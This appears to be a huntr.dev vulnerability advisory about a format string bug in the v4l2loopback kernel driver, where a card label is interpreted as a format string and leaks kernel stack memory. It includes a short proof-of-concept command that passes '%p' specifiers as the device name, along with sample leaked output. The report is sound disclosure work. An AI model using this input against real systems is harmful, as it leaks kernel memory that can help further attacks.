Lucene search

K
huntrBenbe1B055DA5-7A9E-4409-99D7-030280D242D5
HistoryJul 28, 2022 - 6:44 p.m.

Format string modifiers in card label

2022-07-2818:44:16
benbe
www.huntr.dev
9

0.0005 Low

EPSS

Percentile

17.9%

Description

When adding a new video device with v4l2loopback-ctl that contains a card label with format string modifiers the kernel driver interprets these when querying the device capabilities, thus leaking kernel memory (stack contents).

The vulnerability requires the attacker to have access to the /dev/v4l2loopback, which is owned by root:root with chmod 600 by default. This attack can still be used successfully against kernels in lock down mode.

Proof of Concept

v4l2loopback-ctl add -n "%p-%p-%p"
cat /sys/devices/virtual/video4linux/video2/name 

Output (example):

/dev/video2
00000000de899e9f-00000000f6d35a 

Expected:

/dev/video2
%p-%p-%p

0.0005 Low

EPSS

Percentile

17.9%

Related for 1B055DA5-7A9E-4409-99D7-030280D242D5